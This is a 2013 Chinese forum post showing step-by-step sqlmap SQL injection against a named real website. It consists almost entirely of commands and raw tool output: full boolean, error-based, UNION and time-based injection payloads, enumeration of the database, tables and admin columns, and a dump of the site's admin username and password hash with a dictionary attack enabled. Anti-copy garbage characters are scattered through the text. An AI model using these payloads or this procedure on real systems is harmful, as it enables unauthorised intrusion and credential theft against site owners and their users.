找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 O) t! y1 M8 u8 [2 hms "Mysql" --current-user       /*  注解:获取当前用户名称
3 `& x) Y) z% k7 C    sqlmap/0.9 - automatic SQL injection and database takeover tool& Q0 t7 G! L7 i5 H- w" B
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54! J: \% M2 l- v7 Q7 J6 w+ ^
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, F8 @# d# ^, T& Z6 k- M! C
    session file" R: }- G: c) M
    [16:53:54] [INFO] resuming injection data from session file+ W- [: @) m9 d/ B8 `$ y
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    : T6 U; E8 [9 k1 U: g0 ?  G[16:53:54] [INFO] testing connection to the target url
    . }6 u9 f. n  J0 nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , H# g# }% U/ N8 ~1 _sts:
    ) P" V2 d/ L1 m' u, |- [5 j---
    * ~- @1 e1 L' @7 hPlace: GET
    ; c( Z' F4 D2 j6 x$ vParameter: id
      P, F2 a, z) u    Type: boolean-based blind
    * \8 ~4 D! b) {) S/ c    Title: AND boolean-based blind - WHERE or HAVING clause9 i* U1 L+ L' R
        Payload: id=276 AND 799=799
    # K, f/ K/ S9 v+ C    Type: error-based
    ; H1 I. N1 I' S# M5 @/ M6 p    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    . l7 @. e( H1 B% E7 t    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ( B5 X) x2 W- P- z- V3 Y% C9 X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ o% V7 c& L: q& F) u
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ( Z" s9 y% S" @# M! a3 {. S( x    Type: UNION query
    ) s' D! L# h( V! L$ H  ]8 d    Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 G. T* _" `% A& v- c. H    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% Z. X& [  T0 U9 {8 B% L
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) ~9 Z- o8 [" ~" m: B6 v1 G
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, \& K8 j1 D. @( f, {: K
        Type: AND/OR time-based blind
    & F8 D, a" u. J: ?5 Y$ o    Title: MySQL > 5.0.11 AND time-based blind4 p3 D  Q5 m  m* w- s" d
        Payload: id=276 AND SLEEP(5)
    + s  J* R" p- x: U$ s8 I8 R: k---$ N7 x$ G7 z6 V3 }7 ^( N1 h
    [16:53:55] [INFO] the back-end DBMS is MySQL
    0 e' @( d, n/ p7 o4 d+ Mweb server operating system: Windows
    " R+ ]* z2 j4 ^! ^web application technology: Apache 2.2.11, PHP 5.3.0* `$ D5 q5 B0 @) S/ E6 ]$ S' h
    back-end DBMS: MySQL 5.0* x/ x; _3 v% W' H% p) F3 t
    [16:53:55] [INFO] fetching current user
    0 G) X2 G9 l$ C5 xcurrent user:    'root@localhost'   2 r, d- Z/ i, r4 a/ `
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    # S8 {$ H0 w. m/ {0 A3 C, Wtput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    5 z) z! Z, T1 A( N- z
    " A) y6 ?8 d: p& [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ! g# |( U- B/ |$ F7 J3 C0 qms "Mysql" --current-db                  /*当前数据库
    1 W0 z6 V5 H0 ]  G" g- J( p    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ) \1 m$ _. _7 v- G    http://sqlmap.sourceforge.net
  • starting at: 16:54:161 ?6 i9 l6 X( Q) ~
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 ?8 t; m6 e, z- o session file
    " t8 g- g$ b0 B5 a[16:54:16] [INFO] resuming injection data from session file# l5 B" k0 k) I1 `  F7 W
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* ~# z( X7 R, ^6 o2 d% T
    [16:54:16] [INFO] testing connection to the target url% B% v$ Z- K6 J+ l
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    & J% u" v% T% O; bsts:8 ]$ R* U% n; g$ q
    ---- D8 z' J: @" o: J
    Place: GET: L4 I/ ~9 j& P' ?% |; w/ S# }
    Parameter: id9 k% D' B+ t' b- `* @
        Type: boolean-based blind
    ; e7 R# `9 ?2 y; @8 ^0 D, q    Title: AND boolean-based blind - WHERE or HAVING clause
    * ]4 \3 i5 R; ]$ L8 {8 [    Payload: id=276 AND 799=799
    ! e  r# x: z: L: B3 E8 Z- h  ?0 U4 v    Type: error-based# t/ l4 c( [9 Q  N4 C) m, G
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    9 o/ g0 {# ?& e9 K& A& r- B3 y- h    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    & U# J; c: G" k/ x$ a: h  G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- @3 V/ f, x, _/ g" F* {
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& `# h- C2 z9 J4 R- H8 }
        Type: UNION query
    0 \# s2 E9 ~& b  W    Title: MySQL UNION query (NULL) - 1 to 10 columns
    - ]7 S( c* o* Y5 ^    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 y' w* U. z* A$ R
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( G1 Y, A# M& e5 S! s
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. ]0 z; H7 v- j, `
        Type: AND/OR time-based blind
    ) i/ t% Z) G1 h    Title: MySQL > 5.0.11 AND time-based blind
    ; [. ~' K, @: d# |9 K    Payload: id=276 AND SLEEP(5)+ `) x& o+ k, n
    ---
    ( y$ S! n5 \$ R7 S( ?% M$ O[16:54:17] [INFO] the back-end DBMS is MySQL0 G5 H" Q; `0 W+ _; a# A# |! F
    web server operating system: Windows
    + I/ Q0 }- w7 a+ k5 cweb application technology: Apache 2.2.11, PHP 5.3.0
    ) |4 [* V7 r2 {# G& dback-end DBMS: MySQL 5.0
    : y! o7 Q1 \0 C1 s. ]) U- i! r[16:54:17] [INFO] fetching current database  e7 y8 Z6 r: S. q6 J* D* ?2 Q
    current database:    'wepost'
    - X4 b$ Z  h" m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    - m9 M/ r1 V: X$ c6 F- q4 _- vtput\www.wepost.com.hk'
  • shutting down at: 16:54:188 A) Z( z" K1 b. O; K/ ?) z; N5 e0 i
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    5 A: d! ]* P8 G( \ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名! ]% w' W$ W7 L4 J  _, ?* B% I
        sqlmap/0.9 - automatic SQL injection and database takeover tool( Y5 I( \3 O! ^' f- ^
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    ; s6 c6 h/ ?  p7 e- R& |- r[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    - F) p1 I1 w, X! A: |5 S% h/ b/ U session file
    ; J2 ~: n  \3 _) M[16:55:25] [INFO] resuming injection data from session file" Z- {4 E; N% Y6 x# s0 {
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ' b2 |* Y, Y. H[16:55:25] [INFO] testing connection to the target url- v8 ^0 |$ c5 k
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    $ [3 [8 G. s" X' g1 A' hsts:' u/ O; C) m8 N: W7 A  k
    ---" b: s- \  V8 X' M1 e
    Place: GET
      [, T* t0 R2 o9 b9 q5 k' O" Z, [# U) JParameter: id
    5 ]- ?( l" Y; D+ a    Type: boolean-based blind1 ^" K# X% c4 x% P5 j6 ^
        Title: AND boolean-based blind - WHERE or HAVING clause
    - h5 e+ w" ?3 U; C) B5 u; g    Payload: id=276 AND 799=799( y+ Y7 U% V7 {7 v: u
        Type: error-based+ N' h7 q1 i2 W3 w% J4 ?1 m
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 }2 N# p8 t) h+ J( T) d- c
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    4 ^, F  A  i, ~% n/ [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 [: x1 U' g- K
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" K+ L# U; O6 I" [- h$ Q$ t
        Type: UNION query8 j9 X8 ^- t& h
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    " z5 U' ?, @/ Q8 g    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * O3 e, Q( B* K1 B3 k(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' c0 z" ]; g- y8 |3 }
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    " [8 f$ L- F4 h& z    Type: AND/OR time-based blind
    6 X. I$ `( P* c    Title: MySQL > 5.0.11 AND time-based blind, X: M% v$ L/ A- B7 A
        Payload: id=276 AND SLEEP(5)2 R  X8 l) z6 |0 Y7 l% R
    ---
    ; d. M8 _* d, C3 }: `  {( i[16:55:26] [INFO] the back-end DBMS is MySQL; L, t9 m4 \- z" s# {
    web server operating system: Windows; p& _: y$ d5 e! V
    web application technology: Apache 2.2.11, PHP 5.3.0* y8 t* v0 q& F$ @, H5 \
    back-end DBMS: MySQL 5.00 g  V  v7 Y6 q# G! v9 f
    [16:55:26] [INFO] fetching tables for database 'wepost'
    4 J+ z) d% h- x: x[16:55:27] [INFO] the SQL query used returns 6 entries
      L3 d2 p& p+ l' G: V  WDatabase: wepost
    , @( Q: E! J6 A: \4 P) X6 e# o[6 tables]% P/ E) p1 y! F! R7 A1 x
    +-------------+
    5 L/ v  x2 u! R. x$ q* C/ O| admin       |
    1 T: E' u' j% k2 e1 X| article     |+ J# v7 K  F" m0 x) G: m& z7 W; g
    | contributor |; i' b3 e! D2 s. K$ X
    | idea        |/ S* a5 y5 {- D0 |
    | image       |
    4 d. y, m; h5 ~| issue       |
    $ i: Y$ V! D2 g5 a+-------------+
    ; ^$ l  A5 I7 ^$ g[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    8 I& _- g  G+ s( [6 Gtput\www.wepost.com.hk'
  • shutting down at: 16:55:33/ m  y; s! Q. S0 z6 `9 c9 L; `* V8 ^
    . P( ~0 p* I9 m9 w& c1 o
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' }, E! B* p. \% p  B, c. A
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    , Q2 m2 U3 K% j% D0 U& Z  b1 }    sqlmap/0.9 - automatic SQL injection and database takeover tool
    : W5 ]3 E; [( C" ^( B4 U    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    6 r: C' ~" W/ \4 K& \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . ?# |) u( e5 i9 \6 ]sts:
    1 K* g6 k2 ]; I/ y; }: w% h7 b. @6 D---
    + O) E/ o  i! _7 ?Place: GET
      V4 `$ l8 }# g" [6 L7 t- ]+ IParameter: id( u" C; |' j$ l- u
        Type: boolean-based blind# w  o) X) o* x0 y/ Y. }) e
        Title: AND boolean-based blind - WHERE or HAVING clause
    ) p) M. ^  S9 \/ B    Payload: id=276 AND 799=799- m9 R2 r" R1 K6 _7 ~
        Type: error-based
    * ^) g7 r* P& @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    4 N6 s7 J# J& B/ h! e1 E3 Q7 j6 ]    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- C3 G7 @3 D) s
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# V, J. [% }: K  }* I7 B+ Q
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): K0 k( i5 R0 J5 Y+ Z; G: w1 g1 ]
        Type: UNION query
    , c3 ~2 z! x- r8 O    Title: MySQL UNION query (NULL) - 1 to 10 columns& z0 P) Y6 R, s1 j/ J: @
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
      Z2 V. E" o; F(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),  m8 j$ B: u1 A" e. |
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    9 j" @$ b2 {' L9 P$ O* }. B( w" }5 V    Type: AND/OR time-based blind9 ?; @" m5 x  ^( @# }. t- D
        Title: MySQL > 5.0.11 AND time-based blind
    + p. X4 }/ k/ _" Z6 h. i    Payload: id=276 AND SLEEP(5)+ N' M8 K3 L# T5 x4 |3 N8 j+ Y) A; a; x
    ---
    7 g, }7 G/ Z7 g! m0 F7 x: L$ uweb server operating system: Windows
    # \( v$ F0 ^% X' dweb application technology: Apache 2.2.11, PHP 5.3.05 Y: h1 m7 b# O: r* e. ^
    back-end DBMS: MySQL 5.0; Y4 ~) f3 p* U' X  }
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    & T! N+ ~, y6 e/ P9 Y; D6 c; `% Yssion': wepost, wepost! Q. T% e3 |- o0 ?- L. T
    Database: wepost$ ?( g$ e* a* D; }0 N- g
    Table: admin8 n7 {5 r1 e& z  R/ V
    [4 columns]
    : m: p+ y; J+ A( k8 I$ |; W+----------+-------------+
    ; P: g6 m6 }7 N( g9 Y; D2 \| Column   | Type        |
      O: k# Q8 j+ P4 a, G+----------+-------------+
    : |" j/ q% \: p| id       | int(11)     |: i. l4 J. r" h1 c
    | password | varchar(32) |
    , p+ g1 x3 _1 W7 ]* d7 [, _; F| type     | varchar(10) |+ A# V4 U  s7 b2 C( Q' t" _
    | userid   | varchar(20) |, t, e7 U- y! S6 t/ s1 j. t
    +----------+-------------+, j! k7 b9 Y- n& l+ R2 `. P
  • shutting down at: 16:56:19  G* E8 [7 _* J; Y
    , y( I1 l% H! A* x4 g
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( [* I% O/ D9 t8 a
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    1 C( t' Y! m4 I; J& @    sqlmap/0.9 - automatic SQL injection and database takeover tool
    # w, v7 [& o4 e    http://sqlmap.sourceforge.net
  • starting at: 16:57:142 I& t" W) g* z$ B7 ^1 B* @0 W
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque" r# K& i3 `6 {9 w. V
    sts:* ^) A! ^: i' K: j6 U
    ---8 M# X, r! q- w9 H5 ]4 C
    Place: GET3 q& P4 w7 M' ^7 R& ]
    Parameter: id
    - B, k9 @- ?( B) K% d' z) Q. @+ e8 }" V/ P    Type: boolean-based blind% v' ?( K& f7 K# s: U8 L7 d9 l
        Title: AND boolean-based blind - WHERE or HAVING clause" a6 p9 o/ b: G& F: x
        Payload: id=276 AND 799=799
      n  T- a& D  m& M4 v" v    Type: error-based. O! l8 V+ m$ X8 q) g7 U
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      y2 a, {- k/ U2 _$ k9 s7 y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 X) A  Y, F/ M+ L6 r% ~
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    2 r+ E: Z) j) s5 z; k),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ' q! }7 f0 F- P) N    Type: UNION query
    $ [. s' \& c: [- C. \% o, i: q# D    Title: MySQL UNION query (NULL) - 1 to 10 columns3 O9 O* Z) [0 ]# `) [. D- j+ b. G
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, H: X- t$ J; E" d
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    , p. r5 u: m! d0 s% M; \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 N- H6 ]3 C$ d! ?# T/ P
        Type: AND/OR time-based blind
    # P& O# b' J$ ?' r$ t    Title: MySQL > 5.0.11 AND time-based blind
    " _: Y( Y9 B/ Y$ K6 K4 s6 q0 m5 {    Payload: id=276 AND SLEEP(5), A- V0 d. ?3 p1 m- d1 L8 O
    ---( _4 z4 A& R- m* u2 N  [
    web server operating system: Windows6 F/ I5 s5 Z- e+ N
    web application technology: Apache 2.2.11, PHP 5.3.0) V1 a; H/ T. ?
    back-end DBMS: MySQL 5.0
    6 H$ ~$ V1 G0 X( nrecognized possible password hash values. do you want to use dictionary attack o
    ! `2 N3 y$ [2 a; Hn retrieved table items? [Y/n/q] y# L  U& q8 O# p# G
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]* ^3 N  i) Y6 E  [8 I4 d
    do you want to use common password suffixes? (slow!) [y/N] y! {: i* F, p$ D
    Database: wepost- T6 q; M: Y2 y! u1 |  B9 p* _
    Table: admin
    3 w7 D4 S0 E0 K$ b5 E1 K8 r4 W% ][1 entry]
    1 f! }  {( w9 j, f2 |' |9 a/ B% n+----------------------------------+------------+. g+ _& K9 J  |" L7 n* d
    | password                         | userid     |
    # }; A. }& g- e5 L+----------------------------------+------------+
    $ o# R- o% d: r0 Z7 ~| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |( f" ^+ }# h7 F" ?, \# m7 v& I
    +----------------------------------+------------+
      X. ^0 L" k: P7 \0 T
  • shutting down at: 16:58:14: g  |; O+ Q& w( z  x& y
    , N; \0 V/ V  C
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表